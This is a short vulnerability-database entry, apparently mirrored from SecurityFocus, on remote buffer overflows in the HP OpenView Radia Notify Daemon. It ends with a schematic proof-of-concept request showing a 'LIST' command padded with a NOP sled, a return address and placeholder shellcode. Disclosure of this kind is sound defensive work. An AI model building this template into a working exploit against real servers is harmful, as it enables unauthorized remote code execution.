HP OpenView Radia 2.0/3.1/4.0 Notify Daemon Multiple Remote Buffer Overflow Vulnerabilities

2014-07-01T00:00:00
ID SSV:79436
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/13835/info

HP OpenView Radia Notify Daemon (RADEXECD) is affected by multiple remote buffer overflow vulnerabilities.

An attacker can craft a malicious request that can overflow a buffer and result in process memory corruption. These issues may be exploited to gain unauthorized access in the context of the server. 

The following proof of concept is available:
<callback port>\0<username>\0<password>\0
"LIST " . (0x90 x <offset>) . <ret_addr> . "." . <shellcode>